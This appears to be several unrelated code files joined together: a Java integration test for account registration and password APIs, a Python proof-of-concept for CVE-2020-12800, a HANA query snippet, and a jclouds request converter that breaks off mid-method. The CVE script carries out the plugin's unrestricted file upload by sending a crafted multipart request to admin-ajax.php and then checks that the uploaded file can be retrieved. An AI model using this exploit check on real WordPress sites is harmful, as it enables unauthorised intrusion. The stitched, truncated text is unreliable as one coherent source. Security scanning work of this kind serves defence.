@WithMockUser(value = TEST_USER_LOGIN)
@IntegrationTest
class AccountResourceIT {
static final String TEST_USER_LOGIN = "test";
@Autowired
private UserRepository userRepository;
@Autowired
private AuthorityRepository authorityRepository;
@Autowired
private UserService userService;
@Autowired
private PasswordEncoder passwordEncoder;
@Autowired
private MockMvc restAccountMockMvc;
@Test
@WithUnauthenticatedMockUser
void testNonAuthenticatedUser() throws Exception {
restAccountMockMvc
.perform(get("/api/authenticate").accept(MediaType.APPLICATION_JSON))
.andExpect(status().isOk())
.andExpect(content().string(""));
}
@Test
void testAuthenticatedUser() throws Exception {
restAccountMockMvc
.perform(
get("/api/authenticate")
.with(request -> {
request.setRemoteUser(TEST_USER_LOGIN);
return request;
})
.accept(MediaType.APPLICATION_JSON)
)
.andExpect(status().isOk())
.andExpect(content().string(TEST_USER_LOGIN));
}
@Test
void testGetExistingAccount() throws Exception {
Set<String> authorities = new HashSet<>();
authorities.add(AuthoritiesConstants.ADMIN);
AdminUserDTO user = new AdminUserDTO();
user.setLogin(TEST_USER_LOGIN);
user.setFirstName("john");
user.setLastName("doe");
user.setEmail("<EMAIL>");
user.setImageUrl("http://placehold.it/50x50");
user.setLangKey("en");
user.setAuthorities(authorities);
userService.createUser(user);
restAccountMockMvc
.perform(get("/api/account").accept(MediaType.APPLICATION_JSON))
.andExpect(status().isOk())
.andExpect(content().contentType(MediaType.APPLICATION_JSON_VALUE))
.andExpect(jsonPath("$.login").value(TEST_USER_LOGIN))
.andExpect(jsonPath("$.firstName").value("john"))
.andExpect(jsonPath("$.lastName").value("doe"))
.andExpect(jsonPath("$.email").value("<EMAIL>"))
.andExpect(jsonPath("$.imageUrl").value("http://placehold.it/50x50"))
.andExpect(jsonPath("$.langKey").value("en"))
.andExpect(jsonPath("$.authorities").value(AuthoritiesConstants.ADMIN));
}
@Test
void testGetUnknownAccount() throws Exception {
restAccountMockMvc
.perform(get("/api/account").accept(MediaType.APPLICATION_PROBLEM_JSON))
.andExpect(status().isInternalServerError());
}
@Test
@Transactional
void testRegisterValid() throws Exception {
ManagedUserVM validUser = new ManagedUserVM();
validUser.setLogin("test-register-valid");
validUser.setPassword("password");
validUser.setFirstName("Alice");
validUser.setLastName("Test");
validUser.setEmail("<EMAIL>");
validUser.setImageUrl("http://placehold.it/50x50");
validUser.setLangKey(Constants.DEFAULT_LANGUAGE);
validUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
assertThat(userRepository.findOneByLogin("test-register-valid")).isEmpty();
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(validUser)))
.andExpect(status().isCreated());
assertThat(userRepository.findOneByLogin("test-register-valid")).isPresent();
}
@Test
@Transactional
void testRegisterInvalidLogin() throws Exception {
ManagedUserVM invalidUser = new ManagedUserVM();
invalidUser.setLogin("funky-log(n"); // <-- invalid
invalidUser.setPassword("password");
invalidUser.setFirstName("Funky");
invalidUser.setLastName("One");
invalidUser.setEmail("<EMAIL>");
invalidUser.setActivated(true);
invalidUser.setImageUrl("http://placehold.it/50x50");
invalidUser.setLangKey(Constants.DEFAULT_LANGUAGE);
invalidUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(invalidUser)))
.andExpect(status().isBadRequest());
Optional<User> user = userRepository.findOneByEmailIgnoreCase("<EMAIL>");
assertThat(user).isEmpty();
}
@Test
@Transactional
void testRegisterInvalidEmail() throws Exception {
ManagedUserVM invalidUser = new ManagedUserVM();
invalidUser.setLogin("bob");
invalidUser.setPassword("password");
invalidUser.setFirstName("Bob");
invalidUser.setLastName("Green");
invalidUser.setEmail("invalid"); // <-- invalid
invalidUser.setActivated(true);
invalidUser.setImageUrl("http://placehold.it/50x50");
invalidUser.setLangKey(Constants.DEFAULT_LANGUAGE);
invalidUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(invalidUser)))
.andExpect(status().isBadRequest());
Optional<User> user = userRepository.findOneByLogin("bob");
assertThat(user).isEmpty();
}
@Test
@Transactional
void testRegisterInvalidPassword() throws Exception {
ManagedUserVM invalidUser = new ManagedUserVM();
invalidUser.setLogin("bob");
invalidUser.setPassword("<PASSWORD>"); // password with only 3 digits
invalidUser.setFirstName("Bob");
invalidUser.setLastName("Green");
invalidUser.setEmail("<EMAIL>");
invalidUser.setActivated(true);
invalidUser.setImageUrl("http://placehold.it/50x50");
invalidUser.setLangKey(Constants.DEFAULT_LANGUAGE);
invalidUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(invalidUser)))
.andExpect(status().isBadRequest());
Optional<User> user = userRepository.findOneByLogin("bob");
assertThat(user).isEmpty();
}
@Test
@Transactional
void testRegisterNullPassword() throws Exception {
ManagedUserVM invalidUser = new ManagedUserVM();
invalidUser.setLogin("bob");
invalidUser.setPassword(null); // invalid null password
invalidUser.setFirstName("Bob");
invalidUser.setLastName("Green");
invalidUser.setEmail("<EMAIL>");
invalidUser.setActivated(true);
invalidUser.setImageUrl("http://placehold.it/50x50");
invalidUser.setLangKey(Constants.DEFAULT_LANGUAGE);
invalidUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(invalidUser)))
.andExpect(status().isBadRequest());
Optional<User> user = userRepository.findOneByLogin("bob");
assertThat(user).isEmpty();
}
@Test
@Transactional
void testRegisterDuplicateLogin() throws Exception {
// First registration
ManagedUserVM firstUser = new ManagedUserVM();
firstUser.setLogin("alice");
firstUser.setPassword("password");
firstUser.setFirstName("Alice");
firstUser.setLastName("Something");
firstUser.setEmail("<EMAIL>");
firstUser.setImageUrl("http://placehold.it/50x50");
firstUser.setLangKey(Constants.DEFAULT_LANGUAGE);
firstUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
// Duplicate login, different email
ManagedUserVM secondUser = new ManagedUserVM();
secondUser.setLogin(firstUser.getLogin());
secondUser.setPassword(<PASSWORD>());
secondUser.setFirstName(firstUser.getFirstName());
secondUser.setLastName(firstUser.getLastName());
secondUser.setEmail("<EMAIL>");
secondUser.setImageUrl(firstUser.getImageUrl());
secondUser.setLangKey(firstUser.getLangKey());
secondUser.setCreatedBy(firstUser.getCreatedBy());
secondUser.setCreatedDate(firstUser.getCreatedDate());
secondUser.setLastModifiedBy(firstUser.getLastModifiedBy());
secondUser.setLastModifiedDate(firstUser.getLastModifiedDate());
secondUser.setAuthorities(new HashSet<>(firstUser.getAuthorities()));
// First user
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(firstUser)))
.andExpect(status().isCreated());
// Second (non activated) user
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(secondUser)))
.andExpect(status().isCreated());
Optional<User> testUser = userRepository.findOneByEmailIgnoreCase("<EMAIL>");
assertThat(testUser).isPresent();
testUser.get().setActivated(true);
userRepository.save(testUser.get());
// Second (already activated) user
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(secondUser)))
.andExpect(status().is4xxClientError());
}
@Test
@Transactional
void testRegisterDuplicateEmail() throws Exception {
// First user
ManagedUserVM firstUser = new ManagedUserVM();
firstUser.setLogin("test-register-duplicate-email");
firstUser.setPassword("password");
firstUser.setFirstName("Alice");
firstUser.setLastName("Test");
firstUser.setEmail("<EMAIL>");
firstUser.setImageUrl("http://placehold.it/50x50");
firstUser.setLangKey(Constants.DEFAULT_LANGUAGE);
firstUser.setAuthorities(Collections.singleton(AuthoritiesConstants.USER));
// Register first user
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(firstUser)))
.andExpect(status().isCreated());
Optional<User> testUser1 = userRepository.findOneByLogin("test-register-duplicate-email");
assertThat(testUser1).isPresent();
// Duplicate email, different login
ManagedUserVM secondUser = new ManagedUserVM();
secondUser.setLogin("test-register-duplicate-email-2");
secondUser.setPassword(<PASSWORD>());
secondUser.setFirstName(firstUser.getFirstName());
secondUser.setLastName(firstUser.getLastName());
secondUser.setEmail(firstUser.getEmail());
secondUser.setImageUrl(firstUser.getImageUrl());
secondUser.setLangKey(firstUser.getLangKey());
secondUser.setAuthorities(new HashSet<>(firstUser.getAuthorities()));
// Register second (non activated) user
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(secondUser)))
.andExpect(status().isCreated());
Optional<User> testUser2 = userRepository.findOneByLogin("test-register-duplicate-email");
assertThat(testUser2).isEmpty();
Optional<User> testUser3 = userRepository.findOneByLogin("test-register-duplicate-email-2");
assertThat(testUser3).isPresent();
// Duplicate email - with uppercase email address
ManagedUserVM userWithUpperCaseEmail = new ManagedUserVM();
userWithUpperCaseEmail.setId(firstUser.getId());
userWithUpperCaseEmail.setLogin("test-register-duplicate-email-3");
userWithUpperCaseEmail.setPassword(<PASSWORD>());
userWithUpperCaseEmail.setFirstName(firstUser.getFirstName());
userWithUpperCaseEmail.setLastName(firstUser.getLastName());
userWithUpperCaseEmail.setEmail("<EMAIL>");
userWithUpperCaseEmail.setImageUrl(firstUser.getImageUrl());
userWithUpperCaseEmail.setLangKey(firstUser.getLangKey());
userWithUpperCaseEmail.setAuthorities(new HashSet<>(firstUser.getAuthorities()));
// Register third (not activated) user
restAccountMockMvc
.perform(
post("/api/register")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(userWithUpperCaseEmail))
)
.andExpect(status().isCreated());
Optional<User> testUser4 = userRepository.findOneByLogin("test-register-duplicate-email-3");
assertThat(testUser4).isPresent();
assertThat(testUser4.get().getEmail()).isEqualTo("<EMAIL>");
testUser4.get().setActivated(true);
userService.updateUser((new AdminUserDTO(testUser4.get())));
// Register 4th (already activated) user
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(secondUser)))
.andExpect(status().is4xxClientError());
}
@Test
@Transactional
void testRegisterAdminIsIgnored() throws Exception {
ManagedUserVM validUser = new ManagedUserVM();
validUser.setLogin("badguy");
validUser.setPassword("password");
validUser.setFirstName("Bad");
validUser.setLastName("Guy");
validUser.setEmail("<EMAIL>");
validUser.setActivated(true);
validUser.setImageUrl("http://placehold.it/50x50");
validUser.setLangKey(Constants.DEFAULT_LANGUAGE);
validUser.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
restAccountMockMvc
.perform(post("/api/register").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(validUser)))
.andExpect(status().isCreated());
Optional<User> userDup = userRepository.findOneWithAuthoritiesByLogin("badguy");
assertThat(userDup).isPresent();
assertThat(userDup.get().getAuthorities())
.hasSize(1)
.containsExactly(authorityRepository.findById(AuthoritiesConstants.USER).get());
}
@Test
@Transactional
void testActivateAccount() throws Exception {
final String activationKey = "some activation key";
User user = new User();
user.setLogin("activate-account");
user.setEmail("<EMAIL>");
user.setPassword(<PASSWORD>StringUtils.<PASSWORD>(60));
user.setActivated(false);
user.setActivationKey(activationKey);
userRepository.saveAndFlush(user);
restAccountMockMvc.perform(get("/api/activate?key={activationKey}", activationKey)).andExpect(status().isOk());
user = userRepository.findOneByLogin(user.getLogin()).orElse(null);
assertThat(user.isActivated()).isTrue();
}
@Test
@Transactional
void testActivateAccountWithWrongKey() throws Exception {
restAccountMockMvc.perform(get("/api/activate?key=wrongActivationKey")).andExpect(status().isInternalServerError());
}
@Test
@Transactional
@WithMockUser("save-account")
void testSaveAccount() throws Exception {
User user = new User();
user.setLogin("save-account");
user.setEmail("<EMAIL>");
user.setPassword(RandomStringUtils.random(60));
user.setActivated(true);
userRepository.saveAndFlush(user);
AdminUserDTO userDTO = new AdminUserDTO();
userDTO.setLogin("not-used");
userDTO.setFirstName("firstname");
userDTO.setLastName("lastname");
userDTO.setEmail("<EMAIL>");
userDTO.setActivated(false);
userDTO.setImageUrl("http://placehold.it/50x50");
userDTO.setLangKey(Constants.DEFAULT_LANGUAGE);
userDTO.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
restAccountMockMvc
.perform(post("/api/account").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(userDTO)))
.andExpect(status().isOk());
User updatedUser = userRepository.findOneWithAuthoritiesByLogin(user.getLogin()).orElse(null);
assertThat(updatedUser.getFirstName()).isEqualTo(userDTO.getFirstName());
assertThat(updatedUser.getLastName()).isEqualTo(userDTO.getLastName());
assertThat(updatedUser.getEmail()).isEqualTo(userDTO.getEmail());
assertThat(updatedUser.getLangKey()).isEqualTo(userDTO.getLangKey());
assertThat(updatedUser.getPassword()).isEqualTo(user.getPassword());
assertThat(updatedUser.getImageUrl()).isEqualTo(userDTO.getImageUrl());
assertThat(updatedUser.isActivated()).isTrue();
assertThat(updatedUser.getAuthorities()).isEmpty();
}
@Test
@Transactional
@WithMockUser("save-invalid-email")
void testSaveInvalidEmail() throws Exception {
User user = new User();
user.setLogin("save-invalid-email");
user.setEmail("<EMAIL>");
user.setPassword(<PASSWORD>(60));
user.setActivated(true);
userRepository.saveAndFlush(user);
AdminUserDTO userDTO = new AdminUserDTO();
userDTO.setLogin("not-used");
userDTO.setFirstName("firstname");
userDTO.setLastName("lastname");
userDTO.setEmail("invalid email");
userDTO.setActivated(false);
userDTO.setImageUrl("http://placehold.it/50x50");
userDTO.setLangKey(Constants.DEFAULT_LANGUAGE);
userDTO.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
restAccountMockMvc
.perform(post("/api/account").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(userDTO)))
.andExpect(status().isBadRequest());
assertThat(userRepository.findOneByEmailIgnoreCase("invalid email")).isNotPresent();
}
@Test
@Transactional
@WithMockUser("save-existing-email")
void testSaveExistingEmail() throws Exception {
User user = new User();
user.setLogin("save-existing-email");
user.setEmail("<EMAIL>");
user.setPassword(RandomStringUtils.random(60));
user.setActivated(true);
userRepository.saveAndFlush(user);
User anotherUser = new User();
anotherUser.setLogin("save-existing-email2");
anotherUser.setEmail("<EMAIL>");
anotherUser.setPassword(RandomStringUtils.random(60));
anotherUser.setActivated(true);
userRepository.saveAndFlush(anotherUser);
AdminUserDTO userDTO = new AdminUserDTO();
userDTO.setLogin("not-used");
userDTO.setFirstName("firstname");
userDTO.setLastName("lastname");
userDTO.setEmail("<EMAIL>");
userDTO.setActivated(false);
userDTO.setImageUrl("http://placehold.it/50x50");
userDTO.setLangKey(Constants.DEFAULT_LANGUAGE);
userDTO.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
restAccountMockMvc
.perform(post("/api/account").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(userDTO)))
.andExpect(status().isBadRequest());
User updatedUser = userRepository.findOneByLogin("save-existing-email").orElse(null);
assertThat(updatedUser.getEmail()).isEqualTo("<EMAIL>");
}
@Test
@Transactional
@WithMockUser("save-existing-email-and-login")
void testSaveExistingEmailAndLogin() throws Exception {
User user = new User();
user.setLogin("save-existing-email-and-login");
user.setEmail("<EMAIL>");
user.setPassword(RandomStringUtils.random(60));
user.setActivated(true);
userRepository.saveAndFlush(user);
AdminUserDTO userDTO = new AdminUserDTO();
userDTO.setLogin("not-used");
userDTO.setFirstName("firstname");
userDTO.setLastName("lastname");
userDTO.setEmail("<EMAIL>");
userDTO.setActivated(false);
userDTO.setImageUrl("http://placehold.it/50x50");
userDTO.setLangKey(Constants.DEFAULT_LANGUAGE);
userDTO.setAuthorities(Collections.singleton(AuthoritiesConstants.ADMIN));
restAccountMockMvc
.perform(post("/api/account").contentType(MediaType.APPLICATION_JSON).content(TestUtil.convertObjectToJsonBytes(userDTO)))
.andExpect(status().isOk());
User updatedUser = userRepository.findOneByLogin("save-existing-email-and-login").orElse(null);
assertThat(updatedUser.getEmail()).isEqualTo("<EMAIL>");
}
@Test
@Transactional
@WithMockUser("change-password-wrong-existing-password")
void testChangePasswordWrongExistingPassword() throws Exception {
User user = new User();
String currentPassword = <PASSWORD>.random(60);
user.setPassword(<PASSWORD>(currentPassword));
user.setLogin("change-password-wrong-existing-password");
user.setEmail("<EMAIL>");
userRepository.saveAndFlush(user);
restAccountMockMvc
.perform(
post("/api/account/change-password")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO("1" + currentPassword, "new password")))
)
.andExpect(status().isBadRequest());
User updatedUser = userRepository.findOneByLogin("change-password-wrong-existing-password").orElse(null);
assertThat(passwordEncoder.matches("new password", updatedUser.getPassword())).isFalse();
assertThat(passwordEncoder.matches(currentPassword, updatedUser.getPassword())).isTrue();
}
@Test
@Transactional
@WithMockUser("change-password")
void testChangePassword() throws Exception {
User user = new User();
String currentPassword = <PASSWORD>.random(60);
user.setPassword(passwordEncoder.encode(currentPassword));
user.setLogin("change-password");
user.setEmail("<EMAIL>");
userRepository.saveAndFlush(user);
restAccountMockMvc
.perform(
post("/api/account/change-password")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO(currentPassword, "new password")))
)
.andExpect(status().isOk());
User updatedUser = userRepository.findOneByLogin("change-password").orElse(null);
assertThat(passwordEncoder.matches("new password", updatedUser.getPassword())).isTrue();
}
@Test
@Transactional
@WithMockUser("change-password-too-small")
void testChangePasswordTooSmall() throws Exception {
User user = new User();
String currentPassword = <PASSWORD>.<PASSWORD>(60);
user.setPassword(passwordEncoder.encode(currentPassword));
user.setLogin("change-password-too-small");
user.setEmail("<EMAIL>");
userRepository.saveAndFlush(user);
String newPassword = RandomStringUtils.random(ManagedUserVM.PASSWORD_MIN_LENGTH - 1);
restAccountMockMvc
.perform(
post("/api/account/change-password")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO(currentPassword, newPassword)))
)
.andExpect(status().isBadRequest());
User updatedUser = userRepository.findOneByLogin("change-password-too-small").orElse(null);
assertThat(updatedUser.getPassword()).isEqualTo(user.getPassword());
}
@Test
@Transactional
@WithMockUser("change-password-too-long")
void testChangePasswordTooLong() throws Exception {
User user = new User();
String currentPassword = <PASSWORD>StringUtils.random(60);
user.setPassword(passwordEncoder.encode(currentPassword));
user.setLogin("change-password-too-long");
user.setEmail("<EMAIL>");
userRepository.saveAndFlush(user);
String newPassword = RandomStringUtils.random(ManagedUserVM.PASSWORD_MAX_LENGTH + 1);
restAccountMockMvc
.perform(
post("/api/account/change-password")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO(currentPassword, newPassword)))
)
.andExpect(status().isBadRequest());
User updatedUser = userRepository.findOneByLogin("change-password-too-long").orElse(null);
assertThat(updatedUser.getPassword()).isEqualTo(user.getPassword());
}
@Test
@Transactional
@WithMockUser("change-password-empty")
void testChangePasswordEmpty() throws Exception {
User user = new User();
String currentPassword = RandomStringUtils.random(60);
user.setPassword(<PASSWORD>(currentPassword));
user.setLogin("change-password-empty");
user.setEmail("<EMAIL>");
userRepository.saveAndFlush(user);
restAccountMockMvc
.perform(
post("/api/account/change-password")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(new PasswordChangeDTO(currentPassword, "")))
)
.andExpect(status().isBadRequest());
User updatedUser = userRepository.findOneByLogin("change-password-empty").orElse(null);
assertThat(updatedUser.getPassword()).isEqualTo(user.getPassword());
}
@Test
@Transactional
void testRequestPasswordReset() throws Exception {
User user = new User();
user.setPassword(RandomStringUtils.random(60));
user.setActivated(true);
user.setLogin("password-reset");
user.setEmail("<EMAIL>");
userRepository.saveAndFlush(user);
restAccountMockMvc
.perform(post("/api/account/reset-password/init").content("<EMAIL>"))
.andExpect(status().isOk());
}
@Test
@Transactional
void testRequestPasswordResetUpperCaseEmail() throws Exception {
User user = new User();
user.setPassword(RandomStringUtils.random(60));
user.setActivated(true);
user.setLogin("password-reset-upper-case");
user.setEmail("<EMAIL>");
userRepository.saveAndFlush(user);
restAccountMockMvc
.perform(post("/api/account/reset-password/init").content("<EMAIL>"))
.andExpect(status().isOk());
}
@Test
void testRequestPasswordResetWrongEmail() throws Exception {
restAccountMockMvc
.perform(post("/api/account/reset-password/init").content("<EMAIL>"))
.andExpect(status().isOk());
}
@Test
@Transactional
void testFinishPasswordReset() throws Exception {
User user = new User();
user.setPassword(RandomStringUtils.random(60));
user.setLogin("finish-password-reset");
user.setEmail("<EMAIL>");
user.setResetDate(Instant.now().plusSeconds(60));
user.setResetKey("reset key");
userRepository.saveAndFlush(user);
KeyAndPasswordVM keyAndPassword = new KeyAndPasswordVM();
keyAndPassword.setKey(user.getResetKey());
keyAndPassword.setNewPassword("<PASSWORD>");
restAccountMockMvc
.perform(
post("/api/account/reset-password/finish")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(keyAndPassword))
)
.andExpect(status().isOk());
User updatedUser = userRepository.findOneByLogin(user.getLogin()).orElse(null);
assertThat(passwordEncoder.matches(keyAndPassword.getNewPassword(), updatedUser.getPassword())).isTrue();
}
@Test
@Transactional
void testFinishPasswordResetTooSmall() throws Exception {
User user = new User();
user.setPassword(Random<PASSWORD>.random(60));
user.setLogin("finish-password-reset-too-small");
user.setEmail("<EMAIL>");
user.setResetDate(Instant.now().plusSeconds(60));
user.setResetKey("reset key too small");
userRepository.saveAndFlush(user);
KeyAndPasswordVM keyAndPassword = new KeyAndPasswordVM();
keyAndPassword.setKey(user.getResetKey());
keyAndPassword.setNewPassword("<PASSWORD>");
restAccountMockMvc
.perform(
post("/api/account/reset-password/finish")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(keyAndPassword))
)
.andExpect(status().isBadRequest());
User updatedUser = userRepository.findOneByLogin(user.getLogin()).orElse(null);
assertThat(passwordEncoder.matches(keyAndPassword.getNewPassword(), updatedUser.getPassword())).isFalse();
}
@Test
@Transactional
void testFinishPasswordResetWrongKey() throws Exception {
KeyAndPasswordVM keyAndPassword = new KeyAndPasswordVM();
keyAndPassword.setKey("wrong reset key");
keyAndPassword.setNewPassword("<PASSWORD>");
restAccountMockMvc
.perform(
post("/api/account/reset-password/finish")
.contentType(MediaType.APPLICATION_JSON)
.content(TestUtil.convertObjectToJsonBytes(keyAndPassword))
)
.andExpect(status().isInternalServerError());
}
}
| 13,094 |
421 | import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''WordPress 'Drag & Drop Multiple File Upload - Contact Form 7' Plugin - Pre-auth RCE''',
"description": '''The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.''',
"severity": "critical",
"references": [
"https://github.com/amartinsec/CVE-2020-12800"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2020-12800",
"cwe-id": "CWE-434"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2020", "wordpress", "wp-plugin", "upload"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/wp-admin/admin-ajax.php"""
method = "POST"
data = """-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="supported_type"
txt%
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="size_limit"
5242880
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="action"
dnd_codedropz_upload
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="type"
click
-----------------------------350278735926454076983690555601
Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%"
Content-Type: application/x-httpd-php
CVE-2020-12800-{{randstr}}
-----------------------------350278735926454076983690555601--"""
headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------350278735926454076983690555601', 'X-Requested-With': 'XMLHttpRequest'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt"""
method = "GET"
data = """"""
headers = {}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp1.status_code == 200) and ("""CVE-2020-12800-{{randstr}}""" in resp1.text) and ("""text/plain""" in str(resp1.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url | 1,275 |
301 | <reponame>jmilkiewicz/iot-starterkit<filename>neo/apps/python/consumption/pyhdb/iotpyhdb.py<gh_stars>100-1000
import pyhdb
connection = pyhdb.connect(
host="localhost",
port=30015,
user="<user>",
password="<password>"
)
cursor = connection.cursor()
cursor.execute("SELECT * FROM NEO_<schema_id>.T_IOT_<message_type_id>")
results = cursor.fetchall()
for result in results:
print result
connection.close() | 158 |
713 | package org.infinispan.xsite.statetransfer;
import java.util.concurrent.CompletionStage;
import io.reactivex.rxjava3.core.Flowable;
/**
* Sends local cluster state to remote site.
*
* @author <NAME>
* @since 12.0
*/
public interface XSiteStatePushTask {
/**
* Perform the state transfer with the state from {@link Flowable}.
* <p>
* The {@link Flowable} can only be iterated after {@code delayer} is completed.
*
* @param flowable The {@link Flowable} with the local cluster state.
* @param delayer A {@link CompletionStage} which is completed when it is allowed to start sending the state.
*/
void execute(Flowable<XSiteState> flowable, CompletionStage<Void> delayer);
}
| 238 |
421 | #include "daScript/daScript.h"
#include "tutorial02aot.h"
using namespace das;
// making custom builtin module
class Module_Tutorial02 : public Module {
public:
Module_Tutorial02() : Module("tutorial_02") { // module name, when used from das file
ModuleLibrary lib;
lib.addModule(this);
lib.addBuiltInModule();
// adding constant to the module
addConstant(*this,"SQRT2",sqrtf(2.0));
// adding function to the module
addExtern<DAS_BIND_FUN(xmadd)>(*this, lib, "xmadd",SideEffects::none, "xmadd");
// and verify
verifyAotReady();
}
virtual ModuleAotType aotRequire ( TextWriter & tw ) const override {
// specifying which include files are required for this module
tw << "#include \"tutorial02aot.h\"\n";
// specifying AOT type, in this case direct cpp mode (and not hybrid mode)
return ModuleAotType::cpp;
}
};
// registering module, so that its available via 'NEED_MODULE' macro
REGISTER_MODULE(Module_Tutorial02);
| 402 |
324 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jclouds.gae;
import static com.google.appengine.api.urlfetch.FetchOptions.Builder.disallowTruncate;
import java.io.IOException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map.Entry;
import java.util.Set;
import javax.inject.Inject;
import javax.inject.Singleton;
import org.jclouds.http.HttpRequest;
import org.jclouds.http.HttpUtils;
import org.jclouds.io.ContentMetadataCodec;
import org.jclouds.io.Payload;
import org.jclouds.util.Closeables2;
import com.google.appengine.api.urlfetch.FetchOptions;
import com.google.appengine.api.urlfetch.HTTPHeader;
import com.google.appengine.api.urlfetch.HTTPMethod;
import com.google.appengine.api.urlfetch.HTTPRequest;
import com.google.appengine.repackaged.com.google.common.base.Throwables;
import com.google.common.base.Function;
import com.google.common.collect.ImmutableSet;
import com.google.common.io.ByteStreams;
import com.google.common.net.HttpHeaders;
@Singleton
public class ConvertToGaeRequest implements Function<HttpRequest, HTTPRequest> {
public static final String USER_AGENT = "jclouds/1.0 urlfetch/1.4.3";
// http://code.google.com/appengine/docs/java/urlfetch/overview.html
public final Set<String> prohibitedHeaders = ImmutableSet.of("Accept-Encoding", "Content-Length", "Host", "Var",
"X-Forwarded-For");
protected final HttpUtils utils;
protected final ContentMetadataCodec contentMetadataCodec;
@Inject
ConvertToGaeRequest(HttpUtils utils, ContentMetadataCodec contentMetadataCodec) {
this.utils = utils;
this.contentMetadataCodec = contentMetadataCodec;
}
/**
* byte [] content is replayable and the only content type supportable by GAE. As such, we
* convert the original request content to a byte array.
*/
@Override
public HTTPRequest apply(HttpRequest request) {
URL url = null;
try {
url = request.getEndpoint().toURL();
} catch (MalformedURLException e) {
Throwables.propagate(e);
}
FetchOptions options = disallowTruncate();
options.doNotFollowRedirects();
if (utils.relaxHostname() || utils.trustAllCerts())
options.doNotFollowRedirects();
options.setDeadline(10.0);
HTTPRequest gaeRequest = new HTTPRequest(url, HTTPMethod.valueOf(request.getMethod().toString()), options);
for (Entry<String, String> entry : request.getHeaders().entries()) {
String header = entry.getKey();
if (!prohibitedHeaders.contains(header))
